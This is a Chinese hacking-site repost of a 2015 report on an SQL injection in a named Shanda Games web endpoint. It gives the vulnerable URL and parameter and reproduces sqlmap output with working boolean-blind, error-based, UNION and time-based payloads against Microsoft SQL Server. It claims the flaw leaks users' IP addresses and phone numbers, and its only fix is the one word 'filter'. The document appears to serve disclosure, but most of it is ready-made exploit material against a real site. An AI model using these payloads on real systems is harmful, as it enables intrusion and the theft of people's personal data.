记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

盛大游戏某站SQL注入可导致当前库用户IP与手机号码泄露

2015-07-08 03:35

盛大游戏又一发注入,权限不高只能查询自己的表。能看到用户激活时的IP和手机号码。

存在注入的地址:


http://blood.sdo.com/NewsApp/GetVoteInfo.ashx?naId=1&bm=utf-8&t=0.3482579686222665&jsoncallback=jQuery110206128954326713232_1433462792000&_=1433462792002&nacId=217818


Payload:


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: nacId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: naId=1&bm=utf-8&t=0.3482579686222665&jsoncallback=jQuery110206128954326713232_1433462792000&_=1433462792002&nacId=217818' AND 8946=8946 AND 'KKsY'='KKsY
Vector: AND [INFERENCE]

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: naId=1&bm=utf-8&t=0.3482579686222665&jsoncallback=jQuery110206128954326713232_1433462792000&_=1433462792002&nacId=217818' AND 2110=CONVERT(INT,(SELECT CHAR(113)+CHAR(99)+CHAR(100)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (2110=2110) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(110)+CHAR(113))) AND 'puHS'='puHS
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: naId=1&bm=utf-8&t=0.3482579686222665&jsoncallback=jQuery110206128954326713232_1433462792000&_=1433462792002&nacId=217818' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(99)+CHAR(100)+CHAR(110)+CHAR(113)+CHAR(82)+CHAR(108)+CHAR(99)+CHAR(68)+CHAR(107)+CHAR(118)+CHAR(90)+CHAR(110)+CHAR(89)+CHAR(67)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(110)+CHAR(113),NULL--
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: naId=1&bm=utf-8&t=0.3482579686222665&jsoncallback=jQuery110206128954326713232_1433462792000&_=1433462792002&nacId=-7349' OR 5039=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'huTO'='huTO
Vector: OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
---
[18:43:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008

 

和其他游戏公用一个数据库,但是权限不够无法查看。
 

XPMR5WKEU4L`874E@1LW}77.png



泄露大量用户IP地址和手机号:
 

8HW(FGM97OU7DW7RX{2A8QB.png

 

解决方案:

过滤

 
知识来源: www.2cto.com/Article/201507/415294.html

阅读:87662 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“盛大游戏某站SQL注入可导致当前库用户IP与手机号码泄露”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云